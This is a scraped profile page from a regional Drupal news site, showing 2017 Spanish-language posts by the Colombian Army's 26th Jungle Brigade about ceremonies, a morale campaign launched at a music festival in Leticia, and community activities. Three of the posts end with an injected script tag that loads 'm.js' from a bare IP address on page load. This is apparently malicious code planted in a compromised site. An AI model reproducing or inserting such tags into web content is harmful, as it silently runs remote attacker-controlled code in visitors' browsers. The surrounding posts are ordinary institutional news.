ejercitobrigada26

Menssagem de erro

User warning: The following module is missing from the file system: comments. For information about how to fix this, see the documentation page. em _drupal_trigger_error_with_delayed_logging() (linha 1143 de /var/www/tabatingahoje/includes/bootstrap.inc).

Histórico

Membro há
3 anos 1 semana
Acción integral BR 26

Seguidores

1

ejercitobrigada26

Foto de ejercitobrigada26
Ubicación: 
AMZ
Colômbia
4° 12' 43.2144" S, 69° 56' 35.8692" W
Amazonas CO

Información

Acompañamiento de los actos protocolarios en mención del aniversario No. 34 de TABATINGA por parte...
Comandante de la Brigada de Selva No 26 / Coronel Nelson Roberto Carvajal Reyes
Mes a mes, las Fuerzas Militares de Brasil, Colombia y Perú se integran para izar el pabellón de...
El grupo GEOS de La Brigada de selva Nº 26 de manera articulada con el Liceo los angeles ubicado en...
Foto de ejercitobrigada26
quinta-feira, Novembro 23, 2017 - 10:19

Los Héroes del Ejército Nacional trabajamos por la paz de nuestro país por eso "Estamos en el Corazón de los Colombianos y Ahí Nos Vamos a Quedar".

12751
0
0 Comments
Votos totales: 58
Foto de ejercitobrigada26
quinta-feira, Novembro 23, 2017 - 09:36

Los Héroes Multimisión de la Vigésima Sexta Brigada realizaron el lanzamiento oficial de la Campaña "Estamos en el Corazón de los Colombianos y Ahí Nos Vamos a Quedar" durante el primer día del Festival Internacional de Música Popular Amazonense "El Pirarucú de Oro" que se lleva a cabo en la Concha Acústica "Francisco de Orellana" del Municipio de Leticia del 22 al 25 de noviembre.

El Señor Coronel Raúl Alonso Parra Bayona fue el encargado de dar el discurso de apertura con el que se lanzó oficialmente esta campaña que busca arraigar el sentido de pertenencia de la población hacia sus Fuerzas Militares y resaltar la labor que realizan todos sus miembros en los 32 departamentos del país.

El lanzamiento contó con la presentación de la señorita Miss Mundo 2014, Leandra García, y del director de la Emisora Colombia Estéreo 88.5 FM, Sargento Viceprimero José Polo Padilla, quienes fueron los encargados de moderar el evento en el que se presentó el vídeo de la canción oficial "Estoy en tu corazón", se realizó un minuto de silencio en homenaje a los héroes caídos en cumplimiento del deber y se dieron regalos a la comunidad donados por el Ejército Nacional, la Armada de la República de Colombia y la Fuerza Aérea Colombiana.

Los soldados del Ejército Nacional seguimos trabajando por la integridad de nuestro país y sus habitantes, por eso es que "Estamos en el Corazón de los Colombianos y Ahí Nos Vamos a Quedar" porque somos Héroes Multimisión, Nuestra Misión es Colombia.

Acción Integral de la brigada de selva No 26

12749
0
0 Comments
Votos totales: 56
Foto de ejercitobrigada26
quinta-feira, Novembro 23, 2017 - 09:10
El Señor Coronel Raúl Alonso Parra Bayona fue el encargado de dar el discurso de lanzamiento de la Campaña "Estamos en el Corazón de los Colombianos y Ahí Nos Vamos a Quedar" y de agradecer en nombre de las Fuerzas Armadas a todos los colombianos que con su afecto y amor nos hacen sentir orgullosos de salvaguardar la integridad y la soberanía de la Nación. <script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
12747
0
0 Comments
Votos totales: 56
Foto de ejercitobrigada26
quinta-feira, Novembro 23, 2017 - 08:28
Los Héroes Multimisión del Ejército Nacional realizaron el lanzamiento oficial de la Campaña "Estamos en el Corazón de los Colombianos y Ahí Nos Vamos a Quedar" en la Concha Acústica "Francisco de Orellana" del municipio de Leticia. El evento se realizó en el marco del primer día del Festival Internacional de Música Popular Amazonense "El Pirarucú de Oro". <script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
12744
0
0 Comments
Votos totales: 58
Foto de ejercitobrigada26
quinta-feira, Outubro 26, 2017 - 10:00
La Brigada de Selva No.26 continua realizando actividades de fortalecimiento institucional con las comunidades del departamento.<script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
12350
0
0 Comments
Votos totales: 27
Foto de ejercitobrigada26
domingo, Setembro 10, 2017 - 11:27

Heroes multimision de la Brigada de Selva No 26 atendieron el llamado de las autoridades ambientales del departamento.

La actividad se llevo a cabo en el malecón y la isla de la fantasia de Leticia, donde nuestros héroes multimision, junto con la Policía Nacional, la gobernación del Amazonas, la alcaldía de Leticia y otras entidades gubernamentales y privadas que se unieron a esta gran jornada de aseo y conservación del medio ambiente ara mostrar las capacidades que tiene nuestro Héroes Multimision en el municipio de Leticia Amazonas en la implementación de nuestro programa de Todos para todos y pata todos *FE EN COLOMBIA* con el único objetivo de beneficiar a nuestras comunidades y dejando muy en alto nuestra ímagen institucional con nuestras campañas " *ESTAMOS EN EL CORAZÓN DE LOS COLOMBIANOS Y AHÍ NOS VAMOS A QUEDAR*

11714
0
0 Comments
Votos totales: 49
Foto de ejercitobrigada26
quinta-feira, Setembro 7, 2017 - 20:08

Héroes multimisión de la Brigada de Selva No 26 al mando del Señor Coronel RAUL ALONSO PARRA BAYONA, participaron en el desfile militar en conmemoración de los 195 años de independencia de la hermana república federativa del Brasil, una vez mas con esto se demuestra que están afianzados los lazos de hermandad,amistad y cooperación entre los dos países.

Brigada de selva No 26

11680
0
0 Comments
Votos totales: 52
Foto de ejercitobrigada26
segunda-feira, Setembro 4, 2017 - 11:06

Celebración de Aniversario en santa rosa perú 43 años como comunidad y 12 años como poblado.
Se acompañaron autoridades. Señores Alcaldes, sub-prefecto,Tenientes, Gobernador, Jefe de la marina, Comandante de Ejercito Peruano, Comandante de Brigado de selva N°26 de Colombia. Autoridades Y publico en Generalde de santa rosa Perú.

11639
0
0 Comments
Votos totales: 49
Foto de ejercitobrigada26
sábado, Setembro 2, 2017 - 14:36

Como lo hacen nuestro Hérues Multimisión cada vez que culminan la etapa de instrucción y entrenamiento que caracteriza los primeros meses de vida de los colombianos que prestan el servicio militar, hoy juraron bandera los soldados del segundo contingente de 2017 del batallón de Infantería de Selva N°50 "General Luis Acevedo Torres" del Batallón de A.S.P.C N°26 "SS Nestor Ospina Melo" y del Batallón de Instrucción, Entranamiento y Reentrenamiento (Biter N°26) "Nicolás rojas".

La ceremonia estuvo precedida por el comandante de la Brigada de Selva N°26, Coronel Raúl Alonso Parra Bayona, y contón con la presencia de las autoridades civiles y eclesiásticas de la región, quien pudieron presenciar la izada del pabellón nacional, los honores a la bandera de guerra y la toma del juramento de estos Soldados del Ejército Nacional que ante de Dios, sus superiores, sus compañeros y el pueblo colombiano juraron seguir defendiendo la soberanía de nuestro territorio y la integridad de nuestra amada nación.

Estos soldados que hoy consagran su vida al servicio del país para salvaguardar y preservar la paz en cada uno de sus rincones,como lo estipulan los planes de moral y bienestar a los que tiene derecho las tropas de nuestras Fuerzas Militares, se irán de licencia durante un mes a sus hogares a compartir tiempo con sus familias para regresar al término de la mismo y seguir sirviendo con ese espíritu patriótico que los hace estar en el corazón de los colombianos.

Brigada de selva No 26

11620
0
0 Comments
Votos totales: 46
Foto de ejercitobrigada26
sábado, Agosto 26, 2017 - 17:34

Nuestros Héroes Multimisión realizan la izada del Pabellón Nacional, como es habitual en el Malecón de Leticia, Amazonas.
Este acto se hace en honor a nuestros símbolos patrios, que buscan generar más sentido de pertenecia en nuestros soldados como pobladores de la Amazonía Colombiana, para la preservacion de estos.
La Ceremonia estuvo precedida por el Señor Coronel Raul Alonso Parra Bayona, Comandante de la Vigésima Sexta Brigada de Selva ascrita a la Sexta División del Ejército Nacional, quien ha liderado todas las actividades en pro del respeto de nuestros símbolos patrios, y es a través de sus hombres quien invita a la comunidad a unirse en estas jornadas, y poder insertar en los más pequeños el amor por nuestra querida y respetada Colombia.
La Brigada de Selva N°26 encamina cada una de sus acciones, dentro del Marco de consolidación y estabilización Victoria.

11562
0
0 Comments
Votos totales: 64